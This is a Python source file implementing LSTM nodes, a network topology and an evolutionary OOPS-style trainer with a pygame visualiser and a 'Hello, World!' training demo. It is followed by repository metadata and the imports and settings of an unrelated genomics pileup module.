visited[s]=True
self.ordered=ordered
def Connect(self,source,sink):
"""
Connects specified connection points
source: 2-tuple or list of 2-tuples or None
signal source (from an output port)
When source is None creates an input terminal
sink: 2-tuple or list of 2-tuples or None
signal destination (to an input port)
When sink is None creates an output terminal
Each specified source will be connected all specified sinks
Input or output terminal creation returns an appropriate object
Duplicated connection edges are silently filtered
"""
if source is None and sink is None:
# I/O terminal pair with no intervening nodes is likely a user error
raise TopologyError("Attempt to create I/O terminal pair that bypasses nodes.")
# Create input or output terminal
newbie=None
if source is None:
newbie=Input()
source=(newbie,Input)
if sink is None:
newbie=Output()
sink=(newbie,Output)
# make sure Inputs and Outputs aren't incorrectly placed
if type(source[0])==Output:
raise TopologyError("Output terminals as sources not permitted.")
if type(sink[0])==Input:
raise TopologyError("Input terminals as sinks not permitted.")
# normalize when terminals provided
if type(sink[0])==Output:
# the sneaky caller didn't use auto-create for
# output terminals but we still need outRefs to them
self.outRefs[sink[0]]=1
# normalize output terminal's channel designation
sink=(sink[0],Output)
if type(source[0])==Input:
# normalize input terminal's channel designation
source=(source[0],Input)
# make single tuples lists of tuples
if not isinstance(source,list):
origPoints=[source]
else:
origPoints=source
if not isinstance(sink,list):
destPoints=[sink]
else:
destPoints=sink
# validate connection specs
origCount=len(origPoints)
idx=0
for CP in origPoints+destPoints:
# origPoints want an output channel
isSource=1
if idx>=origCount:
# destPoints want an input channel
isSource=0
try:
cpNode,cpChan=CP
except TypeError:
raise TopologyError("Connect: %s not of form (x,y) or [x,y]" % CP)
if not cpChan in [Input,Output]:
try:
aCPs=cpNode.availableConnectionPoints()
except AttributeError:
raise TopologyError("Connect: %s: %s is not a valid node" % (CP,cpNode))
if cpChan not in aCPs.keys():
raise TopologyError("Connect: node %s: no such port %s" % (cpNode,cpChan))
if aCPs[cpChan]!=isSource:
raise TopologyError("Connect: connection %s is not an %s" % (\
CP, ['input','output'][isSource]))
else:
if cpChan==Input and not isSource==1:
raise TopologyError("Connect: illegal incoming connection to input terminal")
if cpChan==Output and isSource==1:
raise TopologyError("Connect: illegal outgoing connection from output terminal")
idx=idx+1
# make connections
for orig in origPoints:
for dest in destPoints:
# store connection
C=(orig,dest)
self.connections[C]=1.0
# memoize nodes involved with connection
# to improve performance of Activate()
if orig[1]!=Input:
self.nodeRefs[orig[0]]=True
if dest[1]!=Output:
self.nodeRefs[dest[0]]=True
# indicate network is unsorted
self.ordered=None
# returns the input or output terminal if one was created
# otherwise None
return newbie
def getTargets(self,source,channel):
"""
Get list of connection destinations for the specified source
"""
found=[]
for (src,srcChan),(dest,destChan) in self.connections:
if src==source and srcChan==channel:
found.append((dest,destChan))
return found
def getInputs(self,sink,channel):
"""
Gets list of all weighted values feeding to the specified sink
"""
found=[]
for (src,srcChan),(dest,destChan) in self.connections:
if dest==sink and destChan==channel:
w=self.connections[((src,srcChan),(dest,destChan))]
value=w*src.read(channel=srcChan)
found.append(value)
return found
def getSources(self,sink,channel):
"""
Gets list of all connections feeding specified sink
"""
found=[]
for (src,srcChan),(dest,destChan) in self.connections:
if dest==sink and destChan==channel:
found.append(((src,srcChan),(dest,destChan)))
return found
def Activate(self):
"""
Activates network nodes
Input and Output terminals are not passes in themselves but
nodes with sinks connected to Input terminals will receive
the values of the corresponding terminals. The output
levels are sampled (ie: the Output nodes written with
values) after all nodes activate.
"""
if self.ordered is None:
self.makeOrdered()
# activate each node
for n in self.nodeRefs:
n.Activate(self)
# node activations are done now activate each output
for o in self.outRefs:
sigma=sum(self.getInputs(o,Output))
if self.SquishOutput:
o.write(sigmoid(sigma))
else:
o.write(sigma)
class NodeError(Exception):
""" when something goes wrong in a node """
def __init__(self,val):
self.value=val
def __str__(self):
return self.value
class LSTM_Node:
"""
Long Short Term Memory node
The above extra gates could be useful in some topologies to enable
    localized problem space searching within the network itself.
has inputs:
input - input
inputGate - input attenuator
forgetGate - internal state attenuator
outputGate - output attenuator
has outputs:
output - node's output
peephole - node's internal state
optional:
output activation function
"""
iConns=["input","inputGate","forgetGate","outputGate"]
oConns=["peephole","output"]
connMap={
k:v for (k,v) in \
[(x,0) for x in iConns] + \
[(x,1) for x in oConns]
}
def __init__(self,*args,**kwargs):
""" sets up node """
self.CEC=0.0
self.serNo=serNo()
self.states={k:v for (k,v) in [(x,0.0) for x in LSTM_Node.oConns]}
for chan in LSTM_Node.iConns:
self.states[chan]={
"value":None,
}
def __lt__(self,n):
return self.serNo<n.serNo
def __str__(self):
info="{'CEC':%s,'peephole':%s,'output':%s,'inputs':%s}" % (\
self.CEC,self.states['peephole'],\
self.states['output'],\
{ k:self.states[k] for k in LSTM_Node.iConns})
return Formatter.pformat(eval(info))
def availableConnectionPoints(self,**kwargs):
""" enumerate connection points """
if "InputOnly" in kwargs:
return LSTM_Node.iConns
if "OutputOnly" in kwargs:
return LSTM_Node.oConns
return LSTM_Node.connMap
def read(self,**kwargs):
"""
Query a channel's value
"""
if "channel" in kwargs:
ch=kwargs["channel"]
if ch in LSTM_Node.connMap.keys():
if ch in LSTM_Node.oConns:
return self.states[ch]
else:
return self.states[ch]['value']
else:
raise NodeError("LSTM_Node: no such channel '%s'" % ch)
else:
raise NodeError("LSTM_Node: read() must specify a channel")
def Activate(self,net):
"""
perform activation pass
"""
# activate input and scale to [-2,2]
self.states['input']['value']=4.0*sigmoid(sum(net.getInputs(self,'input')))-2.0
# activate inputGate
self.states['inputGate']['value']=sigmoid(sum(net.getInputs(self,'inputGate')))
# compute gated input
gatedInput=self.states['input']['value']*self.states['inputGate']['value']
# apply input to internal state
self.CEC=self.CEC+gatedInput
# activate forget gate
self.states['forgetGate']['value']=sigmoid(sum(net.getInputs(self,'forgetGate')))
# gate internal state (applies forgetfulness)
self.CEC=self.CEC*self.states['forgetGate']['value']
# squish the ungated output (peephole)
self.states['peephole']=sigmoid(self.CEC)
# activate output gate
# NB: This is done after squished peephole value is known
# so that the fresh CEC state is visible to the output gate
self.states['outputGate']['value']=sigmoid(sum(net.getInputs(self,'outputGate')))
# gate (already squished) output
self.states['output']=self.states['peephole']*self.states['outputGate']['value']
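# Illustrative sketch (added for clarity, not part of the original file): the
# smallest possible use of the Topology/LSTM_Node interface described in the
# Topology docstring -- one auto-created Input terminal feeding a single LSTM
# node whose output drives one auto-created Output terminal.
def _example_single_node_net():
    """ build a one-node net, push a value through it and return the output """
    net=Topology()
    node=LSTM_Node()
    iterm=net.Connect(None,(node,'input'))    # Connect returns the new Input terminal
    oterm=net.Connect((node,'output'),None)   # Connect returns the new Output terminal
    iterm.write(0.5)
    net.Activate()
    return oterm.read()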
class OOPS:
"""
OOPS - Optimal Ordered Problem Solver
A little about OOPS and how it is being implemented:
A true OOPS is more complicated and I've simplified it
to work in constant storage with fixed search cycles.
Some of the theoretical aspects like changing the search
algorithm are not imeplemented. A general OOPS blows up
in storage requirement due to the need to store *all*
prior solutions. I am using a fixed solution store
ordered by increasing error (or decreasing fitness).
OOPS basically solves a sequence problems and may use
previous solutions as the basis to solve future problems.
For this trainer case the goal (problem) is defined as:
Yielding a weight vector that reduces training error
(supervised) or increases fitness score (unsupervised).
So any vector of weights that achieves the goal is a solution
to the problem. The problem is defined incrementally to make
the implementation on-line friendly.
Once a solution is found OOPS algorithm is to add the solution
to a holding space for solution examples then present the solution.
The implementation of presenting the solution is to apply the
weights of the solution vector to the current Topology.
OOPS would then solve the next problem. Here we obtain a new
    problem from the incremental definition by remembering the gain
made by the solution (reduced error or gained reward). This
effectively yields the next problem with "the bar slightly raised"
whose goal is a further reduction of error or gain of reward. By
repeating the cycle over many epochs it becomes possible to train
the network to a desired behavior.
When a new network is created it has no previous solutions on record.
Furthermore OOPS specifies that timeslices should both look through
solutions on record AND explore the problem space for novel solutions.
I implement this search by copying a weight vector then applying
a random number of randomly chosen evolution operators (radical,
sign-invert, splice, swap and transpose):
radical: some weight in the vector is replaced by a whole new
randomly chosen value.
sign-invert: one weight in the vector's sign is inverted.
splice: 50% of the vector is randomly overwritten with the
contents of a weighted random selection of a previous
solution's vector. The weighting curve (1.0-cos(x),
0.0<=x<=Pi/2.0) favors elements at the top of the list
since they are the highest fitness. Splice will not
be chosen when there is only one solution in the solution
store (first solution is initialized to the initial
network when trainer is created).
swap: swap some weight in the vector with some other weight.
transpose: one weight in the vector is swapped with a neighbour.
-- Backtracking --
Since LSTM is recurrent and has states that change over time (the
internal LSTM states, known as Constant Error Carousels or CECs for
short) provides a unique source of possible solutions by introspecting
the states of the Topology's CECs in solutions.
I implement a very simple form of backtracking. Whenever a solution
is recorded, so is the current state of CECs in the Topology,
essentially, the timestamp the solution was found.
I will call it as such.
    NB: My search algorithm is sterile right now; it doesn't
actually move in time between searches effectively.
Might be faster to have less cross passes and rely more on the
affector.
I do four different search operations in an epoch:
        1. evaluate all previous solutions at current timestamp
2. generate a number of mutated weight vectors
3. test the vectors in (2) at current timestamp
4. test the vectors in (2) at timestamps of all previous solutions
I can describe these steps in humorous layman:
1. See what happens if ancient mutants were living now.
2. "Honey, I want some mutants! Bring forth the plutonium
and let's make some passionate glowing radioactive love."
3. "Honey, how well did our mutant kids do in the educatatron
today?"
4. "Honey get the time machine! I want to see how our precious
mutant kids do in the past."
    So it can be gleaned that the search is going to check for new solutions
that might work better if they were done in the previous timestamps.
- First off the current timestamp is saved: TS_now
- search result initialized to Topology's current weighting,
timestamp (TS_now), and fitness level
- Each previous solution is tried at TS_now
- any better performing result replaces current search result
- generate some number mutants
- for each mutant
- test mutant at TS_now
- if better the current search result is replaced
- test mutant at all past timestamps (of previous solutions)
- any better-performing result replaces current search
result
After the above procedure the best search result is moved to the top
    of the solution store and when the store is already at capacity the
worst (bottom) entry is first discarded to make room. The result
is also stored into the Topology's weights and CECs and the error
or fitness of the result is remembered for the next epoch. It is
possible all terms fail to find a better alternative and the result
will be that the Topology is unmodified (since the best found result
is initialized with the current Topology's state and fitness first).
    Voila!
We have an OOPS/EVOLINO hybrid.
    Some approaches to evaluate each search term:
1 evaluate a training set (invert sign of error so that negative
        indicates higher error)
2 run a simulation that can yield a performance factor
3 if your net writes stories put em on a website and get
crowdsourced ratings. Speed things up a bit by using an
SVR to approximate ratings using regression (human crowd
sourcing greatly slows down the training process otherwise).
4 similar process to 3 if your net draws art, makes music, etc.
Note: It is possible to change fitness test regime if desired.
If the net is forgetting too soon it needs more nodes, better
connectivity, or an alternate topology. Try arranging with nodes in
hypercubes where nodes connect only to immediate neighbours in the
hypercube, input terminals, or output terminals; however, be certain
each node connects to its neighbours on all axes (in a cube each node
has 3 neighbours, 4 in a tesseract, 5 in a pentaract, etc.)
The hypercube formation forces the network to learn to cluster
information and flow it towards the outputs. BTW the number of CECs
in a hypercube Topology will be 2^N where N is the dimension of the
    hypercube. To keep connectivity reasonable try only connecting
neighbouring LSTM gates, excepting the input terminals which should
connect to all gates of gates of all nodes connected to input
terminals. A similar crossing should exist on the output. Each
output terminal should get as input the outputs of all nodes that feed
an output terminal.
"""
def __init__(self,*args,**kwargs):
"""
Create the OOPS Trainer
NB: !!! Do not add or modify connections on the
Topology once a trainer is created for it !!!
The stored solutions list only weights and CEC states to
minimize storage, and the length and ordering of these lists
depends on the ordering found in net.connections and
net.nodeRefs when the Trainer was created.
Arguments:
Topology - The Topology for trainer to operate on
maxSolutions - Solution store maximum size (default 1000)
"""
self.maxSolutions=1000
if 'maxSolutions' in kwargs:
self.maxSolutions=kwargs['maxSolutions']
self.maxSolutions=max(1,self.maxSolutions)
# make list of mutation operator references
self.mutationOps=[getattr(self,'mutate%s'%i) for i in [
'Splice','Radical','Sign','Swap','Transpose','Tumor']]
self.net=None
if 'Topology' in kwargs:
self.net=kwargs['Topology']
if self.net is None:
raise TypeError("OOPS: No network specified.")
# randomize initial weights
for c in self.net.connections:
self.net.connections[c]=EntropySource.uniform(-.1,1)
for n in self.net.nodeRefs:
n.CEC=EntropySource.uniform(-.1,.1)
n.output=0.0
"""
arguments to evaluator:
topology: the network's Topology object
returns:
resulting rank of solution
NB: network state will be configured for the
candidate and timestamp (CEC state), and thus
completely ready to test, when called
"""
self.solutions=[]
self.evalfunc=None
if 'Evaluator' in kwargs:
self.changeEvaluator(kwargs['Evaluator'])
if self.evalfunc is None:
raise TypeError("OOPS: No evaluator specified.")
"""
when net improves we remember which weights were changed
and the activity is weighted by the degree of change that
resulted. Whenever updated the vector is normalized
to have maximum activity 1.0
        so generally whenever a weight participates in a better result
its activity increases by 1.0 however we will scale the change
by the net change in fitness from the previous best
also 1.0 assumes weights are always modified by a fixed constant
or not at all so I further scale by the distance of the change
made to the weight.
the noise inducers have a choice to either cause more noise
to affective "good" weights that have raised fitness or cause noise
on "bad" weights that have lowered fitness.
The affect will basically allow filtering modifications to allow
those that have the best history of improving fitness and attenuate
the ones that negated the fitness. It's a very poor man's analogue
to a kalman filter and as such uses no matrix math nor derivatives.
Again I want to avoid gradient based training since it has the
issue of local minima. I also want something adaptive (the fitness
function is ALLOWED to change). The ability of the fitness metric
to change is exactly why 50% of the search should be in "bad"
weightspace and 50% in known "good" weightspace.
We will do 50% of each
Ideally affect would be managed separate such that one affect vector
is tracker for every internal RNN state reached. This has intractable
storage requirements.
the affect is a global training aspect and should
        be updated by all tests (every mutant updates this metric)
we are trying to make the mutator smarter over time by coming up with
some data about where in the weightspace to do mutations
"""
self.resetAffect()
self.currentSolves=0
self.minFitness=float("inf")
self.maxFitness=float("-inf")
self.TrainingEpoch=self.TrainingEpoch_Backprop
def evaluator(self,net,**kwargs):
global visual,elapsed,since,framerate,font,textregion
for evt in pygame.event.get():
if evt.type == pygame.QUIT:
raise KeyboardInterrupt
now=pygame.time.get_ticks()
delta=now-since
elapsed+=delta
since=now
weightCount=len(self.net.connections)
newRk=self.evalfunc(net)
self.minFitness=min(self.minFitness,newRk)
self.maxFitness=max(self.maxFitness,newRk)
bgColor=(0,0,128)
divColor=(0,0,0)
if 'original' in kwargs and 'current' in kwargs and 'originalFitness' in kwargs:
org=kwargs['original']
cur=kwargs['current']
oldRk=kwargs['originalFitness']
self.updateAffect(org,cur,newRk-oldRk)
if elapsed>framerate:
while elapsed>framerate:
elapsed-=framerate
r=pygame.Rect(16,10,6*weightCount-1,211)
pygame.draw.rect(visual,bgColor,r)
for x in range(weightCount):
bar=100*self.weightAffect[x]
xbar=100-bar
#pygame.draw.line(visual,(255,0,0),(18+x*6,10), (18+x*6,10+xbar),5)
pygame.draw.line(visual,(0,255,0),(18+x*6,110),(18+x*6,110-bar),5)
prevBar=100*sigmoid(org[x])
xPrevBar=100-prevBar
curBar=100*sigmoid(cur[x])
xCurBar=100-curBar
pygame.draw.line(visual,bgColor,(16+x*6,120),(16+x*6,120+xPrevBar),2)
pygame.draw.line(visual,(255,0,255), (16+x*6,220),(16+x*6,220-prevBar),2)
pygame.draw.line(visual,bgColor,(19+x*6,120),(19+x*6,120+xCurBar),2)
pygame.draw.line(visual,(128,0,255), (19+x*6,220),(19+x*6,220-curBar),2)
if (x+1)<weightCount:
pygame.draw.line(visual,divColor,(21+x*6,10),(21+x*6,220),1)
nameImg=font.render(self.testId,True,(160,160,224))
pygame.draw.rect(visual,(0,0,0),textregion)
visual.blit(nameImg,(16,234))
pygame.display.flip()
return newRk
def resetAffect(self):
self.weightAffect=[1.0]*len(self.net.connections)
self.affectInit=True
def updateAffect(self,priorWts,currentWts,netFitness):
"""
Updates weight affects then renormalizes to [0,1]
where 0 is worst affect, 1 is best
"""
weightCount=len(priorWts)
self.affectInit=False
        if not (len(priorWts)==len(currentWts)==len(self.weightAffect)):
            raise TypeError("updateAffect: Incompatible weightspaces (sizes differ).")
topChg=float("-Inf")
btmChg=float("Inf")
fScale=self.maxFitness-self.minFitness
if fScale==0.0:
fScale=float("Inf")
        # normalizes magnitude of modification
# 1.0=most, 0.0=least
for idx in range(weightCount):
magnitude=math.fabs(currentWts[idx]-priorWts[idx])
change=magnitude*(netFitness/fScale)
topChg=max(topChg,magnitude)
btmChg=min(btmChg,magnitude)
offset=btmChg
scale=topChg-btmChg
if scale==0.0:
# prevent dividum byzeroum
scale=float("Inf")
minAff=0
maxAff=0
for idx in range(weightCount):
magnitude=math.fabs(currentWts[idx]-priorWts[idx])
change=(magnitude/scale)*(netFitness/fScale)
affect=self.weightAffect[idx]+change
self.weightAffect[idx]=affect
minAff=min(minAff,affect)
maxAff=max(maxAff,affect)
offset=minAff
scale=maxAff-minAff
if scale==0.0:
# prevent dividum byzeroum
scale=float("Inf")
for idx in range(weightCount):
nAffect=(self.weightAffect[idx]-offset)/scale
self.weightAffect[idx]=nAffect
def changeEvaluator(self,testFunc):
self.evalfunc=testFunc
self.minFitness=float("Inf")
self.maxFitness=float("-Inf")
if self.solutions==[]:
save=self.saveSnapshot()
rank=self.evalfunc(self.net)
self.minFitness=min(self.minFitness,rank)
            self.maxFitness=max(self.maxFitness,rank)
log.log(log.last(),which='solveLog')
self.solutions=[(save,rank)]
self.rank=rank
self.loadSnapshot(save)
else:
save=self.saveSnapshot()
self.rank=self.evalfunc(self.net)
# to change evaluator we need to reevaluate solutions
            # then resort them by descending fitness
#print("*** Trainer changed - reevaluating solutions")
for idx in range(len(self.solutions)):
((sW,sS),sR)=self.solutions[idx]
self.loadSnapshot((sW,sS))
sR=self.evalfunc(self.net)
#print(" %s" % log.last())
self.solutions[idx]=((sW,sS),sR)
self.minFitness=min(self.minFitness,sR)
                self.maxFitness=max(self.maxFitness,sR)
self.loadSnapshot(save)
# re-sort solutions by descending fitness of new evaluation regime
self.solutions=sorted(self.solutions,key=lambda s:s[1],reverse=True)
def TrainingEpoch_Backprop(self,**kwargs):
"""
        Backpropagating trainer
with the ability to change fitness functions
comes an annoying problem... what is his
derivative?
solution:
treat the fitness as an inverted error!
an increase of fitness is a decrease of error
if we track the min and max fitness results we can
get a normalized error function
the best fitness encountered is a zero error
        and the worst fitness encountered is an error of 1.0
this will be our "error delta"
once this is done we have the usual gradient descent
of an error square and his derivative
it should be understood that on the first pass we have
        a problem because we don't have any range of the error
gradient as of yet. solution: do the activation
with temporarily noisified weights. this will yield
a different fitness factor that can be used to bootstrap
the estimator. the above process must repeat if the
fitness function is changed.
so we will not know in the trainer the exact output values
but we don't need that step... the normalized "error delta"
will substitute where we would normally have needed
expectedResult-actualResult
"""
((curWt,curSt),curRk)=self.solutions[0]
self.loadWeights(curWt)
self.loadState(curSt)
learnRate=0.0001
if 'learnRate' in kwargs:
learnRate=kwargs['learnRate']
# Not done yet
self.solutions[0]=((curWt,curSt),curRk)
def TrainingEpoch_Evolve(self):
sol=self.solutions[0]
#self.loadSnapshot(self.solutions[0][0])
self.loadWeights(self.solutions[0][0][0])
TS_now=self.saveState()
curTerm={'w':self.saveWeights(),'s':TS_now,'r':self.rank}
searchTerm={'w':self.saveWeights(),'s':TS_now,'r':self.rank}
# create some mutations
mutantCount=1000
# maximum random mutation operators per gene
mCount=len(self.solutions)+len(self.net.connections)
alternate=0
# will cylce good/bad affects
oscillateAlternate=1
if self.affectInit:
# if affect is in a reset state
# we don't want to oscillate
# since it means 50% of mutants
# won't be modified at all on first
# pass and thus wasted
oscillateAlternate=0
for mutantId in range(mutantCount):
self.testId="Mutant_%s" % (str(1000-mutantId).rjust(4,"0"))
# pick a random first parent
mutant=[]+self.solutions[
round((len(self.solutions)-1)*(1.0-math.cos(EntropySource.uniform(0.0,halfPi))))
][0][0]
#mutant=[]+self.solutions[0][0][0]
mutationCount=round(EntropySource.uniform(1,mCount))
# splice (mating to second random parent)
self.mutationOps[0](mutant)
egg=[]+mutant
# mutate mutant
"""
for mutations in range(mutationCount):
# apply randomly chosen mutation operator (other than splice)
op=round(EntropySource.uniform(1,len(self.mutationOps)-1))
self.mutationOps[op](mutant)
"""
for idx in range(len(mutant)):
new=EntropySource.uniform(-2,2)
org=mutant[idx]
aff=self.weightAffect[idx]**2.0
if (alternate==0):
# mutate "good" weights
# aff=0.0 is org, aff=1.0 is new
mutant[idx]=org*(1.0-aff)+new*aff
else:
# mutate "bad" weights
# aff=1.0 is org, aff=0.0 is new
mutant[idx]=org*aff+new*(1.0-aff)
"""
scribe=[]+egg
for idx in range(len(mutant)):
scribe[idx]=mutant[idx]
self.loadWeights(scribe)
scribe[idx]=egg[idx]
self.loadState(TS_now)
rk=self.evaluator(self.net,
original=searchTerm['w'],
current=scribe,
originalFitness=searchTerm['r'])
if rk>searchTerm['r']:
searchTerm['w']=[]+mutant
searchTerm['s']=TS_now
searchTerm['r']=rk
log.log(log.last(),which='solveLog')
self.solutions=[((searchTerm['w'],searchTerm['s']),searchTerm['r'])]+\
self.solutions[0:self.maxSolutions-1]
self.rank=rk
self.currentSolves+=1
"""
alternate=oscillateAlternate-alternate
# test at TS_now
self.loadWeights(mutant)
#self.loadState(TS_now)
rk=self.evaluator(self.net,
original=searchTerm['w'],
current=mutant,
originalFitness=searchTerm['r'])
if rk>searchTerm['r']:
searchTerm['w']=[]+mutant
searchTerm['s']=TS_now
searchTerm['r']=rk
log.log(log.last(),which='solveLog')
self.solutions=[((searchTerm['w'],searchTerm['s']),searchTerm['r'])]+\
self.solutions[0:self.maxSolutions-1]
self.rank=rk
self.currentSolves+=1
# if we found anything better store the best solution
if searchTerm['r']>curTerm['r']:
self.loadWeights(searchTerm['w'])
#self.loadState(searchTerm['s'])
self.rank=searchTerm['r']
def mutateTumor(self,chrom):
# similar to Radical but affects a
# randomly chosen section of the victim
p1=round(EntropySource.uniform(0,len(chrom)))
p2=p1
while p2==p1:
p2=round(EntropySource.uniform(0,len(chrom)))
lhs=min(p1,p2)
rhs=max(p1,p2)
ugly=[0.0]*(rhs-lhs)
for c in range(rhs-lhs):
radical=EntropySource.uniform(-6.0,6.0)
ugly[c]=radical
chrom[lhs:rhs]=ugly
def mutateRadical(self,chrom):
where=round(EntropySource.uniform(0,len(chrom)-1))
radical=EntropySource.uniform(-6.0,6.0)
chrom[where]=radical
return chrom
def mutateSign(self,chrom):
where=round(EntropySource.uniform(0,len(chrom)-1))
chrom[where]=-chrom[where]
return chrom
def mutateSplice(self,chrom):
nSol=len(self.solutions)
which=1.0-math.cos(EntropySource.uniform(0.0,halfPi))
which=round(which*float(nSol-1))
((other,sS),sR)=self.solutions[which]
picked=[False]*len(chrom)
for transcribe in range(int(len(chrom)/2)):
k=round(EntropySource.uniform(0,len(chrom)-1))
while picked[k]:
k=round(EntropySource.uniform(0,len(chrom)-1))
picked[k]=True
chrom[k]=other[k]
return chrom
def mutateSwap(self,chrom):
a=round(EntropySource.uniform(0,len(chrom)-1))
b=a
while b==a:
b=round(EntropySource.uniform(0,len(chrom)-1))
temp=chrom[a]
chrom[a]=chrom[b]
chrom[b]=temp
return chrom
def mutateTranspose(self,chrom):
a=round(EntropySource.uniform(0,len(chrom)-1))
b=(a+1) % len(chrom)
temp=chrom[a]
chrom[a]=chrom[b]
chrom[b]=temp
return chrom
def saveWeights(self):
return []+[self.net.connections[edge] for edge in sorted(self.net.connections)]
def saveState(self):
nodes=self.net.nodeRefs
return []+[n.CEC for n in nodes]+[n.states['output'] for n in nodes]
def saveSnapshot(self):
return (self.saveWeights(),self.saveState())
def loadWeights(self,Wts):
idx=0
for edge in self.net.connections:
self.net.connections[edge]=Wts[idx]
idx=idx+1
def loadState(self,innerState):
skip=int(len(innerState)/2)
idx=0
for n in self.net.nodeRefs.keys():
n.CEC=innerState[idx]
n.states['peephole']=sigmoid(n.CEC)
n.states['output']=innerState[idx+skip]
idx=idx+1
def loadSnapshot(self,snap):
Wts,CECs=snap
self.loadWeights(Wts)
self.loadState(CECs)
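# Illustrative sketch (added for clarity, not part of the original file): the
# flavour of the weight-vector mutations described in the OOPS docstring
# (radical, sign-invert, transpose), applied to a plain Python list without
# touching any trainer state. The real operators live in OOPS.mutateRadical,
# mutateSign and mutateTranspose above.
def _example_mutate_weight_vector(weights):
    """ return a mutated copy of 'weights' using three of the documented operators """
    mutant=[]+weights
    # radical: replace one weight with a fresh random value
    where=round(EntropySource.uniform(0,len(mutant)-1))
    mutant[where]=EntropySource.uniform(-6.0,6.0)
    # sign-invert: flip the sign of one weight
    where=round(EntropySource.uniform(0,len(mutant)-1))
    mutant[where]=-mutant[where]
    # transpose: exchange a weight with its neighbour (wrapping at the end)
    a=round(EntropySource.uniform(0,len(mutant)-1))
    b=(a+1)%len(mutant)
    mutant[a],mutant[b]=mutant[b],mutant[a]
    return mutant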
if __name__ == "__main__":
try:
from pprint import PrettyPrinter
fmt=PrettyPrinter(indent=2,width=40)
net=Topology()
inputs={}
outputs={}
node_labels="A,B,C,D"
connections=[
"AB","AC","AD",
"BA","BC","BD",
"CA","CB","CD",
"DA","DB","DC",
]
input_connections=[
"0A","0B","0C","0D",
"1A","1B","1C","1D",
"2A","2B","2C","2D"
]
output_connections=[
"D0"
]
        nodes = { idx : LSTM_Node() for idx in node_labels.split(',')}
nodenames={ nodes[k] : k for k in nodes }
for nm in nodes:
n=nodes[nm]
net.Connect((n,'peephole'),(n,'inputGate'))
net.Connect((n,'peephole'),(n,'forgetGate'))
net.Connect((n,'peephole'),(n,'outputGate'))
for c in connections:
net.Connect((nodes[c[0]],"output"),(nodes[c[1]],"input"))
net.Connect((nodes[c[0]],"output"),(nodes[c[1]],"inputGate"))
net.Connect((nodes[c[0]],"output"),(nodes[c[1]],"forgetGate"))
net.Connect((nodes[c[0]],"output"),(nodes[c[1]],"outputGate"))
for c in output_connections:
idx=int(c[1])
outputs[idx]=net.Connect((nodes[c[0]],"output"),None)
for c in input_connections:
idx=int(c[0])
dst=c[1]
if dst in ['0','1','2','3','4','5','6','7','8','9']:
net.Connect((inputs[idx],Input),(outputs[int(dst)],Output))
else:
if idx in inputs:
net.Connect((inputs[idx],Input),(nodes[dst],"input"))
else:
inputs[idx]=net.Connect(None,(nodes[dst],"input"))
"""
print("Inputs:")
fmt.pprint(inputs)
print("Outputs:")
fmt.pprint(outputs)
print("Nodes:")
fmt.pprint(nodes)
fmt.pprint(nodenames)
print("Connections:")
for c in net.connections.keys():
n1,c1=c[0]
n2,c2=c[1]
w=net.connections[c]
if n1 in nodenames.keys():
n1="Node "+nodenames[n1]
if n2 in nodenames.keys():
n2="Node "+nodenames[n2]
if c1==Input:
c1="*"
if c2==Output:
c2="*"
lhs="%s:%s" % (n1,c1)
rhs="%s:%s" % (n2,c2)
print("%s --> %s W=%s" % (lhs.rjust(15),rhs.ljust(15),w))
"""
def Tester(theNet,test=""):
global testlog
# learn test string
# the outputs scaled to range 0..255 and rounded to get ASCII
eTerms=0.0
inputs[0].write(0) # no input used for this test
prevTgt=0.0
prevOut=0.0
result=""
for c in test:
# second input is previous character
inputs[1].write(prevOut/255.0)
inputs[2].write(prevTgt/255.0)
theNet.Activate()
# compare output to expect and calculate error squares
o1=ord(c)
o2=round(outputs[0].read()*255.0)
prevOut=outputs[0].read()
                # normalize the ord to a fraction so that unrounded
# output may be used for error calculation
of1=float(o1)
prevTgt=of1/255.0
of2=outputs[0].read()*255.0
eTerms+=(of2-of1)*(of2-of1)
result=result+chr(o2)
eDist=math.sqrt(float(eTerms))
fitness=-eDist
log.log("'%s':'%s', fitness=%s" % (test,result,fitness))
# negate so higher error = lower fitness
return fitness
Trainer=OOPS(Topology=net,Evaluator=Tester)
test="Hello, World!"
#prefixes=[]
epoch=1
print("Goal sequence: %s" % test)
for pfx in range(len(test)):
#for pfx in [len(test)-1]:
subTest=partial(Tester,test=test[0:pfx+1])
Trainer.changeEvaluator(subTest)
while round(Trainer.solutions[0][1])<0:
solves=Trainer.currentSolves
Trainer.TrainingEpoch()
newSolves=Trainer.currentSolves-solves
lastSolve=log.last('solveLog')
if newSolves>0:
gotcha=["+","-"][round(Trainer.solutions[0][1])<0]
print("Epoch %s %s %s (%s solutions)" % (str(epoch).rjust(12,'0'),
gotcha,lastSolve,len(Trainer.solutions)))
epoch+=1
#prefixes.append(Trainer.solutions[0])
#Trainer.solutions=[]+prefixes
finally:
pygame.quit()
|
gau-veldt/LSTM_OOPS
|
lstm_oops.py
|
Python
|
gpl-3.0
| 46,930
|
[
"Brian"
] |
21cd21f5200ab2343257258410c6b85e46e8e7b43085c780ae43a78eb388f783
|
import sys
#sys.path.append('/home/dskola/workspace/expression_modeling/')
import matplotlib
#matplotlib.use('Agg')
import collections
import contextlib
import csv
import datetime
import math
import multiprocessing
import os
import re
import shutil
import subprocess
import gzip
import numpy
import scipy.ndimage
import scipy.signal
from model import pp_mappability
# import pp_mappability
from pgtools import toolbox
from model import motifs
from pgtools import myplots
from model import antfarm
from model import filterchains
THREADS = 31
MULTI_PROCESSING_METHOD = 'hybrid'
# print 'Using up to {} cores where possible'.format(THREADS)
try:
import mkl
except ImportError:
pass
else:
# print('MKL library found.')
mkl.set_num_threads(THREADS)
REPORTING_INTERVAL = 1000000
DEFAULT_CHROMOSOME_DIALECT = 'ucsc'
PILEUP_DTYPE = numpy.float16 # set to half-precision to conserve RAM
VERBOSE = True
NETWORK_TMP_DIR = toolbox.home_path('model_data/tmp')
# LOCAL_TMP_DIR = '/tmp/dskola'
# LOCAL_TMP_DIR = '/dev/shm'
LOCAL_TMP_DIR = NETWORK_TMP_DIR
CHAINFILE_BASEPATH = toolbox.home_path('model_data/chain_files')
INTERVAL_BASEPATH = toolbox.home_path('model_data/best_intervals')
PILEUP_DATA_FOLDER = toolbox.home_path('model_data/saved_pileups')
# LOCAL_TMP_DIR = NETWORK_TMP_DIR
FRAGMENT_SIZES_FILENAME = toolbox.home_path('model_data/fragment_sizes.tsv')
INTERVAL_FILE_TEMPLATE = '{}To{}.best.txt'
MAX_FILEHANDLES_PER_PILEUP = 100
# MAX_MESSAGE_SIZE = 268000000 # maximum number of vector elements that can be passed in a parameter tuple by multiprocessing.Pool
MAX_MESSAGE_SIZE = 10000000
WHITESPACE = re.compile(r'\s*')
